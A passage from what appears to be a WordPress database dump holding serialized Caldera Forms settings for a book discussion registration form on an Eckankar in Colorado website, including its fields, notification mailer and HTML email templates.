Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8015:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #ffffff;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\"><strong>New Admin Web Submission</strong></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400; font-size: 13px;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Request</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"color3-color\" style=\"font-size: 20px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">You have a new<strong><em> Book Discussion</em> </strong>form submission.</p>\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">A user on the <i><strong>Eckankar In Colorado</strong></i> website has submitted this form. The following person has requested contact with an ECK representative.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-size: 13px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">If you have any questions regarding the origin of this form, please feel free to contact the <a class=\"\" href=\"https://www.eckankar-colorado.org\">Eckankar In Colorado </a>webmaster: webmaster@eckankar-colorado.org</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"processors\";a:1:{s:11:\"fp_17689566\";a:5:{s:2:\"ID\";s:11:\"fp_17689566\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:9:{s:11:\"sender_name\";s:20:\"Eckankar In Colorado\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"subject\";s:27:\"Thank you for contacting us\";s:14:\"recipient_name\";s:24:\"%first_name% %last_name%\";s:15:\"recipient_email\";s:15:\"%email_address%\";s:7:\"message\";s:8907:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 48px; font-weight: 400; letter-spacing: 4px; line-height: 48px; border-bottom: solid 4px #23507d;\" valign=\"top\" bgcolor=\"#ffffff\" align=\"center;\">\n<h1 class=\"\" style=\"font-family: \'Bitter\', Georgia, Times, \'Times New Roman\', serif; font-size: 47px; font-weight: normal; letter-spacing: normal; color: #1d5791; text-transform: capitalize; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Eckankar In Colorado</h1>\n<p class=\"\" style=\"font-size: 20px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 600; text-align: center; letter-spacing: 3px; color: #6b6b6b; border: 2px solid #ebebeb; background-color: #e8f2fc;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"600\" data-font-style=\"\">About Your Web Submission Request</p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px; font-weight: 400;\" data-font-weight=\"400\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 20px 30px 25px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ebebeb\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 23px; text-align: center; color: #954c08;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Book Discussion Registration Confirmation</p>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 20px 30px 15px 30px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#ffffff\" align=\"left\">\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 600; font-size: 18px; color: #4c4747; line-height: 31px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Hello %first_name%!</p>\n<p class=\"\" style=\"margin: 0px; font-family: Open Sans; font-weight: 400; font-size: 16px; color: #4c4747;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Thank you for signing up for one of our ECK Book Discussion Classes. We look forward to meeting you! Below is the information that you have submitted to us, which will only be used to respond to your request.</p>\n</td>\n</tr>\n<tr>\n<td bgcolor=\"#ffffff\" align=\"left\">\n<table style=\"width: 100%; height: 25px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr style=\"height: 62px;\">\n<td style=\"padding: 22px 30px; height: 25px; border-top: solid 2px #ccc; border-bottom: solid 2px #ccc;\" bgcolor=\"#EBEBEB\" align=\"left; padding-top: 25px; padding-bottom: 15px;\">\n<table style=\"color: #4c4747; font-family: Open Sans; font-weight: 400; font-size: 16px; line-height: 12px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"border-radius: 3px; text-align: left;\" bgcolor=\"#EBEBEB\" align=\"left\">{summary}</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 30px 30px 30px 30px; border-radius: 4px 4px 4px 4px; color: #666666; font-family: \'Lato\', Helvetica, Arial, sans-serif; font-size: 18px; font-weight: 400; line-height: 25px;\" bgcolor=\"#FFECD1\" align=\"center\">\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">You are receiving this email because you have submitted a request through the Eckankar in Colorado website.</p>\n<p class=\"\" style=\"font-size: 17px; font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; color: #6b6b6b;\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">If you have any questions regarding the origin of this form, please feel free to get in touch — we\'re always happy to help out.</p>\n<p class=\"\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"\" style=\"font-family: \'Trebuchet MS\', Helvetica, sans-serif; font-weight: 400; font-size: 17px;\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Trebuchet MS\" data-font-weight=\"400\" data-font-style=\"\">Contact Us</a></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#f4f4f4\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</div>\n</div>\n</div>\n</div>\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:0:\"\";s:5:\"group\";a:0:{}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:0:{}}s:24:\"privacy_exporter_enabled\";b:0;s:7:\"version\";s:5:\"1.9.4\";}'),(42,'CF60874262a3d99','revision','a:22:{s:2:\"ID\";s:15:\"CF60874262a3d99\";s:13:\"_last_updated\";s:31:\"Wed, 28 Apr 2021 02:11:03 +0000\";s:10:\"cf_version\";s:5:\"1.9.4\";s:4:\"name\";s:28:\"Book Discussion Registration\";s:10:\"scroll_top\";i:1;s:7:\"success\";s:149:\"<center>Thank you for your interest in joining an ECK Book Discussion!<br>\nYou will be contacted soon regarding the class.</center>																		\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";s:11:\"fld_6009157\";s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:7:{s:9:\"fld_29462\";s:3:\"1:1\";s:11:\"fld_8768091\";s:3:\"2:1\";s:11:\"fld_9970286\";s:3:\"2:2\";s:11:\"fld_6009157\";s:3:\"3:1\";s:11:\"fld_3657255\";s:3:\"3:2\";s:11:\"fld_7683514\";s:3:\"4:1\";s:11:\"fld_7908577\";s:3:\"5:1\";}s:9:\"structure\";s:16:\"12|6:6|6:6|12|12\";}s:6:\"fields\";a:7:{s:9:\"fld_29462\";a:7:{s:2:\"ID\";s:9:\"fld_29462\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:6:\"header\";s:4:\"slug\";s:6:\"header\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:109:\"<h2>ECK Book Discussion Registration</h2>\nYour information will only be used to respond to your request.\n<hr>\";}}s:11:\"fld_8768091\";a:8:{s:2:\"ID\";s:11:\"fld_8768091\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"First Name\";s:4:\"slug\";s:10:\"first_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_9970286\";a:8:{s:2:\"ID\";s:11:\"fld_9970286\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:9:\"Last Name\";s:4:\"slug\";s:9:\"last_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";s:4:\"mask\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_6009157\";a:8:{s:2:\"ID\";s:11:\"fld_6009157\";s:4:\"type\";s:5:\"email\";s:5:\"label\";s:13:\"Email Address\";s:4:\"slug\";s:13:\"email_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_3657255\";a:8:{s:2:\"ID\";s:11:\"fld_3657255\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:5:\"Phone\";s:4:\"slug\";s:5:\"phone\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:7:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7683514\";a:8:{s:2:\"ID\";s:11:\"fld_7683514\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:20:\"Comments / Questions\";s:4:\"slug\";s:18:\"comments_questions\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:7;s:7:\"default\";s:0:\"\";s:16:\"email_identifier\";i:0;s:22:\"personally_identifying\";i:0;}}s:11:\"fld_7908577\";a:7:{s:2:\"ID\";s:11:\"fld_7908577\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:12:\"Send Message\";s:4:\"slug\";s:6:\"submit\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:31:\"webmaster@eckankar-colorado.org\";s:8:\"reply_to\";s:15:\"%email_address%\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:15:\"%email_address%\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:20:\"Book Discussion Form\";s:13:\"email_message\";s:8015:\"<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<p>\n<style type=\"text/css\">\n        @media screen {<br />\n            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Regular\'), local(\'Lato-Regular\'), url(https://fonts.gstatic.com/s/lato/v11/qIIYRU-oROkIk8vfvxw6QvesZW2xOQ-xsNqO47m55DA.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: normal;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold\'), local(\'Lato-Bold\'), url(https://fonts.gstatic.com/s/lato/v11/qdgUG4U09HnJwhYI-uK18wLUuEpTyoUstqEm5AMlJo4.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 400;<br />\n                src: local(\'Lato Italic\'), local(\'Lato-Italic\'), url(https://fonts.gstatic.com/s/lato/v11/RYyZNoeFgb0l7W3Vu1aSWOvvDin1pK8aKteLpeZ5c0A.woff) format(\'woff\');<br />\n            }</p>\n<p>            @font-face {<br />\n                font-family: \'Lato\';<br />\n                font-style: italic;<br />\n                font-weight: 700;<br />\n                src: local(\'Lato Bold Italic\'), local(\'Lato-BoldItalic\'), url(https://fonts.gstatic.com/s/lato/v11/HkF_qI1x_noxlxhrhMQYELO3LdcAZYWl9Si6vvxL-qU.woff) format(\'woff\');<br />\n            }<br />\n        }</p>\n<p>        /* CLIENT-SPECIFIC STYLES */<br />\n        body,<br />\n        table,<br />\n        td,<br />\n        a {<br />\n            -webkit-text-size-adjust: 100%;<br />\n            -ms-text-size-adjust: 100%;<br />\n        }</p>\n<p>        table,<br />\n        td {<br />\n            mso-table-lspace: 0pt;<br />\n            mso-table-rspace: 0pt;<br />\n        }</p>\n<p>        img {<br />\n            -ms-interpolation-mode: bicubic;<br />\n        }</p>\n<p>        /* RESET STYLES */<br />\n        img {<br />\n            border: 0;<br />\n            height: auto;<br />\n            line-height: 100%;<br />\n            outline: none;<br />\n            text-decoration: none;<br />\n        }</p>\n<p>        table {<br />\n            border-collapse: collapse !important;<br />\n        }</p>\n<p>        body {<br />\n            height: 100% !important;<br />\n            margin: 0 !important;<br />\n            padding: 0 !important;<br />\n            width: 100% !important;<br />\n        }</p>\n<p>        /* iOS BLUE LINKS */<br />\n        a[x-apple-data-detectors] {<br />\n            color: inherit !important;<br />\n            text-decoration: none !important;<br />\n            font-size: inherit !important;<br />\n            font-family: inherit !important;<br />\n            font-weight: inherit !important;<br />\n            line-height: inherit !important;<br />\n        }</p>\n<p>        /* MOBILE STYLES */<br />\n        @media screen and (max-width:600px) {<br />\n            h1 {<br />\n                font-size: 32px !important;<br />\n                line-height: 32px !important;<br />\n            }<br />\n        }</p>\n<p>        /* ANDROID CENTER FIX */<br />\n        div[style*=\"margin: 16px 0;\"] {<br />\n            margin: 0 !important;<br />\n        }<br />\n    </style>\n</p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><!-- LOGO -->\n<tbody>\n<tr>\n<td bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 0px 10px 40px 10px;\" valign=\"top\" align=\"center\">&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td style=\"padding: 0px 10px 0px 10px;\" bgcolor=\"#5D97D0\" align=\"center\">\n<table style=\"max-width: 600px;\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td style=\"padding: 40px 20px 20px 20px; border-radius: 4px 4px 0px 0px; color: #111111; font-family: 